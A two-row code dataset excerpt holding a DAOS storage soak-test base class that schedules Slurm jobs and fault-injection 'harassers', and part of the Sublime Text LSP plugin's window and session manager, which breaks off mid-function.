source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
test_base.py
|
#!/usr/bin/python
"""
(C) Copyright 2019-2021 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
import os
import time
from datetime import datetime, timedelta
import multiprocessing
import threading
import random
from filecmp import cmp
from apricot import TestWithServers
from general_utils import run_command, DaosTestError, get_log_file
from command_utils_base import CommandFailure
import slurm_utils
from ClusterShell.NodeSet import NodeSet
from getpass import getuser
import socket
from agent_utils import include_local_host
from utils import DDHHMMSS_format, add_pools, get_remote_logs, \
launch_snapshot, launch_exclude_reintegrate, \
create_ior_cmdline, cleanup_dfuse, create_fio_cmdline, \
build_job_script, SoakTestError, launch_server_stop_start, get_harassers, \
create_racer_cmdline, run_event_check, run_monitor_check, \
create_mdtest_cmdline, reserved_file_copy, run_metrics_check
class SoakTestBase(TestWithServers):
# pylint: disable=too-many-public-methods
# pylint: disable=too-many-instance-attributes
"""Execute DAOS Soak test cases.
:avocado: recursive
"""
def __init__(self, *args, **kwargs):
"""Initialize a SoakBase object."""
super().__init__(*args, **kwargs)
self.failed_job_id_list = None
self.test_log_dir = None
self.exclude_slurm_nodes = None
self.loop = None
self.log_dir = None
self.outputsoakdir = None
self.test_name = None
self.test_timeout = None
self.end_time = None
self.soak_results = None
self.srun_params = None
self.harassers = None
self.offline_harassers = None
self.harasser_results = None
self.all_failed_jobs = None
self.username = None
self.used = None
self.dfuse = []
self.harasser_args = None
self.harasser_loop_time = None
self.all_failed_harassers = None
self.soak_errors = None
self.check_errors = None
def setUp(self):
"""Define test setup to be done."""
self.log.info("<<setUp Started>> at %s", time.ctime())
super().setUp()
self.username = getuser()
# Initialize loop param for all tests
self.loop = 1
self.exclude_slurm_nodes = []
# Setup logging directories for soak logfiles
# self.output dir is an avocado directory .../data/
self.log_dir = get_log_file("soak")
self.outputsoakdir = self.outputdir + "/soak"
# Create the remote log directories on all client nodes
self.test_log_dir = self.log_dir + "/pass" + str(self.loop)
self.local_pass_dir = self.outputsoakdir + "/pass" + str(self.loop)
self.sharedlog_dir = self.tmp + "/soak"
self.sharedsoakdir = self.sharedlog_dir + "/pass" + str(self.loop)
# Initialize dmg cmd
self.dmg_command = self.get_dmg_command()
# Fail if slurm partition is not defined
# NOTE: Slurm reservation and partition are created before soak runs.
# CI uses partition=daos_client and no reservation.
# A21 uses partition=normal/default and reservation=daos-test.
# Partition and reservation names are updated in the yaml file.
# It is assumed that if there is no reservation (CI only), then all
# the nodes in the partition will be used for soak.
if not self.client_partition:
raise SoakTestError(
"<<FAILED: Partition is not correctly setup for daos "
"slurm partition>>")
self.srun_params = {"partition": self.client_partition}
if self.client_reservation:
self.srun_params["reservation"] = self.client_reservation
# Check if the server nodes are in the client list;
# this will happen when only one partition is specified
for host_server in self.hostlist_servers:
if host_server in self.hostlist_clients:
self.hostlist_clients.remove(host_server)
self.exclude_slurm_nodes.append(host_server)
# Include test node for log cleanup; remove from client list
local_host_list = include_local_host(None)
self.exclude_slurm_nodes.extend(local_host_list)
if local_host_list[0] in self.hostlist_clients:
self.hostlist_clients.remove((local_host_list[0]))
if not self.hostlist_clients:
self.fail(
"There are no valid nodes in this partition to run "
"soak. Check partition {} for valid nodes".format(
self.client_partition))
def pre_tear_down(self):
"""Tear down any test-specific steps prior to running tearDown().
Returns:
list: a list of error strings to report after all tear down
steps have been attempted
"""
self.log.info("<<preTearDown Started>> at %s", time.ctime())
errors = []
# display final metrics
run_metrics_check(self, prefix="final")
# clear out any jobs in squeue;
if self.failed_job_id_list:
job_id = " ".join([str(job) for job in self.failed_job_id_list])
self.log.info("<<Cancel jobs in queue with ids %s >>", job_id)
try:
run_command(
"scancel --partition {} -u {} {}".format(
self.client_partition, self.username, job_id))
except DaosTestError as error:
# Exception was raised due to a non-zero exit status
errors.append("Failed to cancel jobs {}: {}".format(
self.failed_job_id_list, error))
if self.all_failed_jobs:
errors.append("SOAK FAILED: The following jobs failed {} ".format(
" ,".join(str(j_id) for j_id in self.all_failed_jobs)))
if self.all_failed_harassers:
errors.extend(self.all_failed_harassers)
if self.soak_errors:
errors.extend(self.soak_errors)
if self.check_errors:
errors.extend(self.check_errors)
# Check if any dfuse mount points need to be cleaned
cleanup_dfuse(self)
# daos_agent is always started on this node when start agent is false
if not self.setup_start_agents:
self.hostlist_clients = [socket.gethostname().split('.', 1)[0]]
for error in errors:
self.log.info("<<ERRORS: %s >>\n", error)
return errors
def launch_harasser(self, harasser, pool):
"""Launch any harasser tests if defined in yaml.
Args:
harasser (str): harasser to launch
pool (list): list of TestPool obj
Returns:
status_msg(str): pass/fail status message
"""
# Init the status message
status_msg = None
job = None
results = multiprocessing.Queue()
args = multiprocessing.Queue()
# Launch harasser
self.log.info("\n<<<Launch harasser %s>>>\n", harasser)
if harasser == "snapshot":
method = launch_snapshot
name = "SNAPSHOT"
params = (self, self.pool[0], name)
job = threading.Thread(target=method, args=params, name=name)
elif harasser == "exclude":
method = launch_exclude_reintegrate
name = "EXCLUDE"
params = (self, pool[1], name, results, args)
job = multiprocessing.Process(target=method, args=params, name=name)
elif harasser == "reintegrate":
method = launch_exclude_reintegrate
name = "REINTEGRATE"
params = (self, pool[1], name, results, args)
job = multiprocessing.Process(target=method, args=params, name=name)
elif harasser == "server-stop":
method = launch_server_stop_start
name = "SVR_STOP"
params = (self, pool, name, results, args)
job = multiprocessing.Process(target=method, args=params, name=name)
elif harasser == "server-start":
method = launch_server_stop_start
name = "SVR_START"
params = (self, pool, name, results, args)
job = multiprocessing.Process(target=method, args=params, name=name)
elif harasser == "server-reintegrate":
method = launch_server_stop_start
name = "SVR_REINTEGRATE"
params = (self, pool, name, results, args)
job = multiprocessing.Process(target=method, args=params, name=name)
else:
raise SoakTestError(
"<<FAILED: Harasser {} is not supported. ".format(
harasser))
# start harasser
job.start()
timeout = self.params.get("harasser_to", "/run/soak_harassers/*", 30)
# Wait for harasser job to join
job.join(timeout)
if job.is_alive():
self.log.error(
"<< ERROR: harasser %s is alive, failed to join>>", job.name)
if name not in ["REBUILD", "SNAPSHOT"]:
job.terminate()
status_msg = "<<FAILED: {} has been terminated.".format(name)
raise SoakTestError(
"<<FAILED: Soak failed while running {} . ".format(name))
if name not in ["REBUILD", "SNAPSHOT"]:
self.harasser_results = results.get()
self.harasser_args = args.get()
# Check if the completed job passed
self.log.info("Harasser results: %s", self.harasser_results)
self.log.info("Harasser args: %s", self.harasser_args)
if not self.harasser_results[name.upper()]:
status_msg = "<< HARASSER {} FAILED in pass {} at {}>> ".format(
name, self.loop, time.ctime())
self.log.error(status_msg)
return status_msg
def harasser_job_done(self, args):
"""Call this function when a job is done.
Args:
args (list):name job name of harasser,
status job completion status
vars: variables used in harasser
"""
self.harasser_results[args["name"]] = args["status"]
self.harasser_args[args["name"]] = args["vars"]
def job_setup(self, jobs, pool):
"""Create the cmdline needed to launch job.
Args:
jobs(list): list of jobs to run
pool (obj): TestPool obj
Returns:
job_cmdlist: list of sbatch scripts that can be launched
by slurm job manager
"""
job_cmdlist = []
self.log.info("<<Job_Setup %s >> at %s", self.test_name, time.ctime())
for job in jobs:
jobscript = []
commands = []
nodesperjob = self.params.get(
"nodesperjob", "/run/" + job + "/*", [1])
taskspernode = self.params.get(
"taskspernode", "/run/" + job + "/*", [1])
for npj in list(nodesperjob):
# nodesperjob = -1 indicates to use all nodes in client hostlist
if npj < 0:
npj = len(self.hostlist_clients)
if len(self.hostlist_clients)/npj < 1:
raise SoakTestError(
"<<FAILED: There are only {} client nodes for this job."
" Job requires {}".format(
len(self.hostlist_clients), npj))
for ppn in list(taskspernode):
if "ior" in job:
commands = create_ior_cmdline(self, job, pool, ppn, npj)
elif "fio" in job:
commands = create_fio_cmdline(self, job, pool)
elif "mdtest" in job:
commands = create_mdtest_cmdline(
self, job, pool, ppn, npj)
elif "daos_racer" in job:
commands = create_racer_cmdline(self, job)
else:
raise SoakTestError(
"<<FAILED: Job {} is not supported. ".format(job))
jobscript = build_job_script(self, commands, job, npj)
job_cmdlist.extend(jobscript)
return job_cmdlist
def job_startup(self, job_cmdlist):
"""Submit job batch script.
Args:
job_cmdlist (list): list of jobs to execute
Returns:
job_id_list: IDs of each job submitted to slurm.
"""
self.log.info(
"<<Job Startup - %s >> at %s", self.test_name, time.ctime())
job_id_list = []
# before submitting the jobs to the queue, check the job timeout;
if time.time() > self.end_time:
self.log.info("<< SOAK test timeout in Job Startup>>")
return job_id_list
# job_cmdlist is a list of batch script files
for script in job_cmdlist:
try:
job_id = slurm_utils.run_slurm_script(str(script))
except slurm_utils.SlurmFailed as error:
self.log.error(error)
# Force the test to exit with failure
job_id = None
if job_id:
self.log.info(
"<<Job %s started with %s >> at %s",
job_id, script, time.ctime())
slurm_utils.register_for_job_results(
job_id, self, maxwait=self.test_timeout)
# keep a list of the job_id's
job_id_list.append(int(job_id))
else:
# one of the jobs failed to queue; exit on first fail for now.
err_msg = "Slurm failed to submit job for {}".format(script)
job_id_list = []
raise SoakTestError(
"<<FAILED: Soak {}: {}>>".format(self.test_name, err_msg))
return job_id_list
def job_completion(self, job_id_list):
"""Wait for job completion and cleanup.
Args:
job_id_list: IDs of each job submitted to slurm
Returns:
failed_job_id_list: IDs of each job that failed in slurm
"""
self.log.info(
"<<Job Completion - %s >> at %s", self.test_name, time.ctime())
harasser_interval = 0
failed_harasser_msg = None
harasser_timer = time.time()
check_time = datetime.now()
event_check_messages = []
since = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
# loop time exists after the first pass; no harassers in the first pass
if self.harasser_loop_time and self.harassers:
harasser_interval = self.harasser_loop_time / (
len(self.harassers) + 1)
# If there is nothing to do; exit
if job_id_list:
# wait for all the jobs to finish
while len(self.soak_results) < len(job_id_list):
# wait for the jobs to complete.
# enter tearDown before hitting the avocado timeout
if time.time() > self.end_time:
self.log.info(
"<< SOAK test timeout in Job Completion at %s >>",
time.ctime())
for job in job_id_list:
_ = slurm_utils.cancel_jobs(int(job))
# monitor events every 15 min
if datetime.now() > check_time:
run_monitor_check(self)
check_time = datetime.now() + timedelta(minutes=15)
# launch harassers if enabled;
# one harasser at a time starting on pass2
if self.harassers:
if self.loop >= 2 and (
time.time() > (harasser_timer + harasser_interval)):
harasser = self.harassers.pop(0)
harasser_timer += harasser_interval
failed_harasser_msg = self.launch_harasser(
harasser, self.pool)
time.sleep(5)
if time.time() < self.end_time:
# Run any offline harassers after first loop
if self.offline_harassers and self.loop >= 1:
for offline_harasser in self.offline_harassers:
if time.time() + int(180) < self.end_time:
failed_harasser_msg = self.launch_harasser(
offline_harasser, self.pool)
# wait 2 minutes to issue next harasser
time.sleep(120)
# Gather metrics data after jobs complete
run_metrics_check(self)
# check journalctl for events;
until = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
event_check_messages = run_event_check(self, since, until)
self.check_errors.extend(event_check_messages)
run_monitor_check(self)
# init harasser list when all jobs are done
self.harassers = []
self.offline_harassers = []
if failed_harasser_msg is not None:
self.all_failed_harassers.append(failed_harasser_msg)
# check for JobStatus = COMPLETED or CANCELLED (i.e. TEST TO)
for job, result in list(self.soak_results.items()):
if result in ["COMPLETED", "CANCELLED"]:
job_id_list.remove(int(job))
else:
self.log.info(
"<< Job %s failed with status %s>>", job, result)
# gather all the logfiles for this pass and cleanup test nodes
try:
get_remote_logs(self)
except SoakTestError as error:
self.log.info("Remote copy failed with %s", error)
self.soak_results = {}
return job_id_list
def job_done(self, args):
"""Call this function when a job is done.
Args:
args (list):handle --which job, i.e. the job ID,
state --string indicating job completion status
"""
self.soak_results[args["handle"]] = args["state"]
def execute_jobs(self, jobs, pools):
"""Execute the overall soak test.
Args:
pools (list): list of TestPool obj - self.pool[1:]
Raise:
SoakTestError
"""
job_script_list = []
# Update the remote log directories from new loop/pass
self.sharedsoakdir = self.sharedlog_dir + "/pass" + str(self.loop)
self.test_log_dir = self.log_dir + "/pass" + str(self.loop)
local_pass_dir = self.outputsoakdir + "/pass" + str(self.loop)
result = slurm_utils.srun(
NodeSet.fromlist(self.hostlist_clients), "mkdir -p {}".format(
self.test_log_dir), self.srun_params)
if result.exit_status > 0:
raise SoakTestError(
"<<FAILED: logfile directory not"
"created on clients>>: {}".format(self.hostlist_clients))
# Create local log directory
os.makedirs(local_pass_dir)
os.makedirs(self.sharedsoakdir)
# create the batch scripts
job_script_list = self.job_setup(jobs, pools)
# randomize job list
random.seed(4)
random.shuffle(job_script_list)
# Gather the job_ids
job_id_list = self.job_startup(job_script_list)
# Initialize the failed_job_list to job_list so that any
# unexpected failures will clear the squeue in tearDown
self.failed_job_id_list = job_id_list
# Wait for jobs to finish and cancel/kill jobs if necessary
self.failed_job_id_list = self.job_completion(job_id_list)
# Log the failing job ID
if self.failed_job_id_list:
self.log.info(
"<<FAILED: The following jobs failed %s >>", (" ,".join(
str(j_id) for j_id in self.failed_job_id_list)))
# accumulate failing job IDs
self.all_failed_jobs.extend(self.failed_job_id_list)
# clear out the failed jobs for this pass
self.failed_job_id_list = []
def run_soak(self, test_param):
"""Run the soak test specified by the test params.
Args:
test_param (str): test_params from yaml file
"""
self.soak_results = {}
self.pool = []
self.container = []
self.harasser_results = {}
self.harasser_args = {}
run_harasser = False
self.all_failed_jobs = []
self.all_failed_harassers = []
self.soak_errors = []
self.check_errors = []
self.used = []
test_to = self.params.get("test_timeout", test_param + "*")
self.test_name = self.params.get("name", test_param + "*")
single_test_pool = self.params.get(
"single_test_pool", test_param + "*", True)
harassers = self.params.get("harasserlist", test_param + "*")
job_list = self.params.get("joblist", test_param + "*")
ignore_soak_errors = self.params.get("ignore_soak_errors", test_param + "*", False)
if harassers:
run_harasser = True
self.log.info("<< Initial harasser list = %s>>", harassers)
harasserlist = harassers[:]
# Create the reserved pool with data
# self.pool is a list of all the pools used in soak
# self.pool[0] will always be the reserved pool
add_pools(self, ["pool_reserved"])
# Create the reserved container
resv_cont = self.get_container(
self.pool[0], "/run/container_reserved/*", True)
# populate reserved container with a 500MB file
initial_resv_file = os.path.join(
os.environ["DAOS_TEST_LOG_DIR"], "initial", "resv_file")
try:
reserved_file_copy(self, initial_resv_file, self.pool[0], resv_cont,
num_bytes=500000000, cmd="write")
except CommandFailure as error:
self.fail(error)
# Create pool for jobs
if single_test_pool:
add_pools(self, ["pool_jobs"])
self.log.info(
"Current pools: %s",
" ".join([pool.uuid for pool in self.pool]))
# cleanup soak log directories before test on all nodes
result = slurm_utils.srun(
NodeSet.fromlist(self.hostlist_clients), "rm -rf {}".format(
self.log_dir), self.srun_params)
if result.exit_status > 0:
raise SoakTestError(
"<<FAILED: Soak directories not removed"
"from clients>>: {}".format(self.hostlist_clients))
# cleanup test_node
for log_dir in [self.log_dir, self.sharedlog_dir]:
cmd = "rm -rf {}".format(log_dir)
try:
result = run_command(cmd, timeout=30)
except DaosTestError as error:
raise SoakTestError(
"<<FAILED: Soak directory {} was not removed>>".format(
log_dir)) from error
# Baseline metrics data
run_metrics_check(self, prefix="initial")
# Initialize time
start_time = time.time()
self.test_timeout = int(3600 * test_to)
self.end_time = start_time + self.test_timeout
self.log.info("<<START %s >> at %s", self.test_name, time.ctime())
while time.time() < self.end_time:
# Start new pass
start_loop_time = time.time()
self.log.info(
"<<SOAK LOOP %s: time until done %s>>", self.loop,
DDHHMMSS_format(self.end_time - time.time()))
if not single_test_pool:
# Create pool for jobs
add_pools(self, ["pool_jobs"])
self.log.info(
"Current pools: %s",
" ".join([pool.uuid for pool in self.pool]))
# Initialize harassers
if run_harasser:
if not harasserlist:
harasserlist = harassers[:]
harasser = harasserlist.pop(0)
self.harasser_args = {}
self.harasser_results = {}
self.harassers, self.offline_harassers = get_harassers(harasser)
try:
self.execute_jobs(job_list, self.pool[1])
except SoakTestError as error:
self.fail(error)
# Check space after jobs done
for pool in self.pool:
self.dmg_command.pool_query(pool.uuid)
# Cleanup any dfuse mounts before destroying containers
cleanup_dfuse(self)
self.soak_errors.extend(self.destroy_containers(self.container))
self.container = []
# Remove the test pools from self.pool; preserving reserved pool
if not single_test_pool:
self.soak_errors.extend(self.destroy_pools(self.pool[1]))
self.pool = [self.pool[0]]
self.log.info(
"Current pools: %s",
" ".join([pool.uuid for pool in self.pool]))
# Fail if the pool/containers did not clean up correctly
if not ignore_soak_errors:
self.assertEqual(
len(self.soak_errors), 0, "\n".join(self.soak_errors))
# Break out of loop if smoke
if "smoke" in self.test_name:
break
loop_time = time.time() - start_loop_time
self.log.info(
"<<LOOP %s completed in %s at %s>>", self.loop, DDHHMMSS_format(
loop_time), time.ctime())
# Initialize harasser loop time from first pass loop time
if self.loop == 1 and run_harasser:
self.harasser_loop_time = loop_time
self.loop += 1
# verify reserved container data
final_resv_file = os.path.join(
os.environ["DAOS_TEST_LOG_DIR"], "final", "resv_file")
try:
reserved_file_copy(self, final_resv_file, self.pool[0], resv_cont)
except CommandFailure as error:
self.soak_errors.append(
"<<FAILED: Soak reserved container read failed>>")
if not cmp(initial_resv_file, final_resv_file):
self.soak_errors.append("Data verification error on reserved pool"
" after SOAK completed")
for file in [initial_resv_file, final_resv_file]:
if os.path.isfile(file):
file_name = os.path.split(os.path.dirname(file))[-1]
# save a copy of the POSIX file in self.outputsoakdir
copy_cmd = "cp -p {} {}/{}_resv_file".format(
file, self.outputsoakdir, file_name)
try:
run_command(copy_cmd, timeout=30)
except DaosTestError as error:
self.soak_errors.append(
"Reserved data file {} failed to archive".format(file))
os.remove(file)
self.container.append(resv_cont)
# Gather the daos logs from the client nodes
self.log.info(
"<<<<SOAK TOTAL TEST TIME = %s>>>>", DDHHMMSS_format(
time.time() - start_time))
|
windows.py
|
from ...third_party import WebsocketServer # type: ignore
from .configurations import ConfigManager
from .configurations import WindowConfigManager
from .diagnostics import DiagnosticsCursor
from .diagnostics import DiagnosticsWalker
from .diagnostics import ensure_diagnostics_panel
from .logging import debug
from .logging import exception_log
from .message_request_handler import MessageRequestHandler
from .panels import update_server_panel
from .protocol import Diagnostic
from .protocol import Error
from .protocol import Point
from .rpc import Logger
from .sessions import get_plugin
from .sessions import Manager
from .sessions import Session
from .sessions import SessionViewProtocol
from .settings import userprefs
from .transports import create_transport
from .types import ClientConfig
from .typing import Optional, Any, Dict, Deque, List, Generator, Tuple, Mapping, Iterable
from .views import diagnostic_to_phantom
from .views import extract_variables
from .workspace import disable_in_project
from .workspace import enable_in_project
from .workspace import ProjectFolders
from .workspace import sorted_workspace_folders
from abc import ABCMeta
from abc import abstractmethod
from collections import deque
from copy import deepcopy
from subprocess import CalledProcessError
from time import time
from weakref import ref
from weakref import WeakSet
import json
import os
import sublime
import threading
class AbstractViewListener(metaclass=ABCMeta):
TOTAL_ERRORS_AND_WARNINGS_STATUS_KEY = "lsp_total_errors_and_warnings"
view = None # type: sublime.View
@property
@abstractmethod
def manager(self) -> "WindowManager":
raise NotImplementedError()
@abstractmethod
def on_session_initialized_async(self, session: Session) -> None:
raise NotImplementedError()
@abstractmethod
def on_session_shutdown_async(self, session: Session) -> None:
raise NotImplementedError()
@abstractmethod
def diagnostics_async(self) -> Dict[str, List[Diagnostic]]:
raise NotImplementedError()
@abstractmethod
def diagnostics_panel_contribution_async(self) -> List[str]:
raise NotImplementedError()
@abstractmethod
def sum_total_errors_and_warnings_async(self) -> Tuple[int, int]:
raise NotImplementedError()
@abstractmethod
def update_diagnostic_in_status_bar_async(self) -> None:
raise NotImplementedError()
@abstractmethod
def session_views_async(self) -> Iterable[SessionViewProtocol]:
raise NotImplementedError()
def extract_message(params: Any) -> str:
return params.get("message", "???") if isinstance(params, dict) else "???"
def set_diagnostics_count(view: sublime.View, errors: int, warnings: int) -> None:
try:
key = AbstractViewListener.TOTAL_ERRORS_AND_WARNINGS_STATUS_KEY
if userprefs().show_diagnostics_count_in_view_status:
view.set_status(key, "E: {}, W: {}".format(errors, warnings))
else:
view.erase_status(key)
except Exception:
pass
class WindowManager(Manager):
DIAGNOSTIC_PHANTOM_KEY = "lsp_diagnostic_phantom"
def __init__(
self,
window: sublime.Window,
workspace: ProjectFolders,
configs: WindowConfigManager,
) -> None:
self._window = window
self._configs = configs
self._sessions = WeakSet() # type: WeakSet[Session]
self._workspace = workspace
self._pending_listeners = deque() # type: Deque[AbstractViewListener]
self._listeners = WeakSet() # type: WeakSet[AbstractViewListener]
self._new_listener = None # type: Optional[AbstractViewListener]
self._new_session = None # type: Optional[Session]
self._cursor = DiagnosticsCursor(userprefs().show_diagnostics_severity_level)
self._diagnostic_phantom_set = None # type: Optional[sublime.PhantomSet]
self.total_error_count = 0
self.total_warning_count = 0
def get_config_manager(self) -> WindowConfigManager:
return self._configs
def on_load_project_async(self) -> None:
self._workspace.update()
self._configs.update()
def enable_config_async(self, config_name: str) -> None:
enable_in_project(self._window, config_name)
# TODO: Why doesn't enable_in_project cause on_load_project_async to be called?
self._configs.update()
def disable_config_async(self, config_name: str) -> None:
disable_in_project(self._window, config_name)
# TODO: Why doesn't disable_in_project cause on_load_project_async to be called?
self._configs.update()
def _register_listener(self, listener: AbstractViewListener) -> None:
sublime.set_timeout_async(lambda: self.register_listener_async(listener))
def register_listener_async(self, listener: AbstractViewListener) -> None:
set_diagnostics_count(listener.view, self.total_error_count, self.total_warning_count)
if not self._workspace.contains(listener.view):
# TODO: Handle views outside the workspace https://github.com/sublimelsp/LSP/issues/997
return
self._pending_listeners.appendleft(listener)
if self._new_listener is None:
self._dequeue_listener_async()
def listeners(self) -> Generator[AbstractViewListener, None, None]:
yield from self._listeners
def listener_for_view(self, view: sublime.View) -> Optional[AbstractViewListener]:
for listener in self.listeners():
if listener.view == view:
return listener
return None
def _dequeue_listener_async(self) -> None:
listener = None # type: Optional[AbstractViewListener]
if self._new_listener is not None:
listener = self._new_listener
# debug("re-checking listener", listener)
self._new_listener = None
else:
try:
listener = self._pending_listeners.pop()
if not listener.view.is_valid():
# debug("listener", listener, "is no longer valid")
return self._dequeue_listener_async()
# debug("adding new pending listener", listener)
self._listeners.add(listener)
except IndexError:
# We have handled all pending listeners.
self._new_session = None
return
if self._new_session:
self._sessions.add(self._new_session)
self._publish_sessions_to_listener_async(listener)
if self._new_session:
if not any(self._new_session.session_views_async()):
self._sessions.discard(self._new_session)
self._new_session.end_async()
self._new_session = None
config = self._needed_config(listener.view)
if config:
# debug("found new config for listener", listener)
self._new_listener = listener
self.start_async(config, listener.view)
else:
# debug("no new config found for listener", listener)
self._new_listener = None
return self._dequeue_listener_async()
def _publish_sessions_to_listener_async(self, listener: AbstractViewListener) -> None:
# TODO: Handle views outside the workspace https://github.com/sublimelsp/LSP/issues/997
if self._workspace.contains(listener.view):
for session in self._sessions:
if session.can_handle(listener.view):
# debug("registering session", session.config.name, "to listener", listener)
listener.on_session_initialized_async(session)
def window(self) -> sublime.Window:
return self._window
def sessions(self, view: sublime.View, capability: Optional[str] = None) -> Generator[Session, None, None]:
# TODO: Handle views outside the workspace https://github.com/sublimelsp/LSP/issues/997
if self._workspace.contains(view):
sessions = list(self._sessions)
for session in sessions:
if session.can_handle(view, capability):
yield session
def get_session(self, config_name: str, file_path: str) -> Optional[Session]:
return self._find_session(config_name, file_path)
def _can_start_config(self, config_name: str, file_path: str) -> bool:
return not bool(self._find_session(config_name, file_path))
def _find_session(self, config_name: str, file_path: str) -> Optional[Session]:
for session in self._sessions:
if session.config.name == config_name and session.handles_path(file_path):
return session
return None
def _needed_config(self, view: sublime.View) -> Optional[ClientConfig]:
configs = self._configs.match_view(view)
handled = False
file_name = view.file_name() or ''
if self._workspace.contains(view):
for config in configs:
handled = False
for session in self._sessions:
if config.name == session.config.name and session.handles_path(file_name):
handled = True
break
if not handled:
return config
return None
def start_async(self, config: ClientConfig, initiating_view: sublime.View) -> None:
file_path = initiating_view.file_name() or ''
if not self._can_start_config(config.name, file_path):
# debug('Already starting on this window:', config.name)
return
try:
workspace_folders = sorted_workspace_folders(self._workspace.folders, file_path)
plugin_class = get_plugin(config.name)
if plugin_class is not None:
if plugin_class.needs_update_or_installation():
config.set_view_status(initiating_view, "installing...")
plugin_class.install_or_update()
cannot_start_reason = plugin_class.can_start(
self._window, initiating_view, workspace_folders, config)
if cannot_start_reason:
config.erase_view_status(initiating_view)
self._window.status_message(cannot_start_reason)
return
config.set_view_status(initiating_view, "starting...")
session = Session(self, self._create_logger(config.name), workspace_folders, config, plugin_class)
cwd = workspace_folders[0].path if workspace_folders else None
variables = extract_variables(self._window)
if plugin_class is not None:
additional_variables = plugin_class.additional_variables()
if isinstance(additional_variables, dict):
variables.update(additional_variables)
transport = create_transport(config, cwd, self._window, session, variables)
config.set_view_status(initiating_view, "initialize")
session.initialize(
variables, transport,
lambda session, is_error: self._on_post_session_initialize(initiating_view, session, is_error))
self._new_session = session
except Exception as e:
message = "\n\n".join([
"Could not start {}",
"{}",
"Server will be disabled for this window"
]).format(config.name, str(e))
exception_log("Unable to start {}".format(config.name), e)
if isinstance(e, CalledProcessError):
print("Server output:\n{}".format(e.output.decode('utf-8', 'replace')))
self._configs.disable_temporarily(config.name)
config.erase_view_status(initiating_view)
sublime.message_dialog(message)
# Continue with handling pending listeners
self._new_session = None
sublime.set_timeout_async(self._dequeue_listener_async)
def _on_post_session_initialize(
self, initiating_view: sublime.View, session: Session, is_error: bool = False
) -> None:
if is_error:
session.config.erase_view_status(initiating_view)
self._new_listener = None
self._new_session = None
else:
sublime.set_timeout_async(self._dequeue_listener_async)
def _create_logger(self, config_name: str) -> Logger:
logger_map = {
"panel": PanelLogger,
"remote": RemoteLogger,
}
loggers = []
for logger_type in userprefs().log_server:
if logger_type not in logger_map:
debug("Invalid logger type ({}) specified for log_server settings".format(logger_type))
continue
loggers.append(logger_map[logger_type])
if len(loggers) == 0:
return RouterLogger() # logs nothing
elif len(loggers) == 1:
return loggers[0](self, config_name)
else:
router_logger = RouterLogger()
for logger in loggers:
router_logger.append(logger(self, config_name))
return router_logger
def handle_message_request(self, session: Session, params: Any, request_id: Any) -> None:
view = self._window.active_view()
if view:
MessageRequestHandler(view, session, request_id, params, session.config.name).show()
def restart_sessions_async(self) -> None:
self.end_sessions_async()
listeners = list(self._listeners)
self._listeners.clear()
for listener in listeners:
self.register_listener_async(listener)
def end_sessions_async(self) -> None:
for session in self._sessions:
session.end_async()
self._sessions.clear()
def end_config_sessions_async(self, config_name: str) -> None:
sessions = list(self._sessions)
for session in sessions:
if session.config.name == config_name:
session.end_async()
self._sessions.discard(session)
def get_project_path(self, file_path: str) -> Optional[str]:
candidate = None # type: Optional[str]
for folder in self._workspace.folders:
if file_path.startswith(folder):
if candidate is None or len(folder) > len(candidate):
candidate = folder
return candidate
def on_post_exit_async(self, session: Session, exit_code: int, exception: Optional[Exception]) -> None:
self._sessions.discard(session)
for listener in self._listeners:
listener.on_session_shutdown_async(session)
if exit_code != 0 or exception:
config = session.config
msg = "{} exited with status code {}".format(config.name, exit_code)
if exception:
msg += " and message:\n\n---\n{}\n---".format(str(exception))
msg += "\n\nDo you want to restart {0}?\n\nIf you choose Cancel, {0} will "\
"be disabled for this window until you restart Sublime Text.".format(config.name)
if sublime.ok_cancel_dialog(msg, "Restart {}".format(config.name)):
view = self._window.active_view()
if view:
self.start_async(config, view)
else:
self._configs.disable_temporarily(config.name)
def handle_server_message(self, server_name: str, message: str) -> None:
sublime.set_timeout(lambda: update_server_panel(self._window, server_name, message))
def handle_log_message(self, session: Session, params: Any) -> None:
self.handle_server_message(session.config.name, extract_message(params))
def handle_stderr_log(self, session: Session, message: str) -> None:
if userprefs().log_stderr:
self.handle_server_message(session.config.name, message)
def handle_show_message(self, session: Session, params: Any) -> None:
sublime.status_message("{}: {}".format(session.config.name, extract_message(params)))
def update_diagnostics_panel_async(self) -> None:
panel = ensure_diagnostics_panel(self._window)
if not panel:
return
to_render = [] # type: List[str]
base_dir = None
self.total_error_count = 0
self.total_warning_count = 0
listeners = list(self._listeners)
for listener in listeners:
local_errors, local_warnings = listener.sum_total_errors_and_warnings_async()
self.total_error_count += local_errors
self.total_warning_count += local_warnings
contribution = listener.diagnostics_panel_contribution_async()
if not contribution:
continue
file_path = listener.view.file_name() or ""
base_dir = self.get_project_path(file_path) # What about different base dirs for multiple folders?
file_path = os.path.relpath(file_path, base_dir) if base_dir else file_path
to_render.append(" ◌ {}:".format(file_path))
to_render.extend(contribution)
if isinstance(base_dir, str):
panel.settings().set("result_base_dir", base_dir)
else:
panel.settings().erase("result_base_dir")
panel.run_command("lsp_update_panel", {"characters": "\n".join(to_render)})
for listener in listeners:
set_diagnostics_count(listener.view, self.total_error_count, self.total_warning_count)
def _can_manipulate_diagnostics_panel(self) -> bool:
active_panel = self._window.active_panel()
if active_panel is not None:
return active_panel == "output.diagnostics"
return True
def show_diagnostics_panel_async(self) -> None:
if self._can_manipulate_diagnostics_panel():
self._window.run_command("show_panel", {"panel": "output.diagnostics"})
def hide_diagnostics_panel_async(self) -> None:
if self._can_manipulate_diagnostics_panel():
self._window.run_command("hide_panel", {"panel": "output.diagnostics"})
def select_next_diagnostic_async(self) -> None:
self._select_diagnostic_async(1)
def select_previous_diagnostic_async(self) -> None:
self._select_diagnostic_async(-1)
def unselect_diagnostic_async(self) -> None:
self._set_diagnostic_phantom(None)
def _diagnostics_by_file_async(self) -> Generator[Tuple[str, Mapping[str, Iterable[Diagnostic]]], None, None]:
for listener in self._listeners:
file_name = listener.view.file_name()
if file_name:
yield file_name, listener.diagnostics_async()
def _select_diagnostic_async(self, direction: int) -> None:
file_path = None # type: Optional[str]
point = None # type: Optional[Point]
if not self._cursor.has_value:
active_view = self._window.active_view()
if active_view:
file_path = active_view.file_name()
point = Point(*active_view.rowcol(active_view.sel()[0].begin()))
walk = self._cursor.from_diagnostic(direction) if self._cursor.has_value else self._cursor.from_position(
direction, file_path, point)
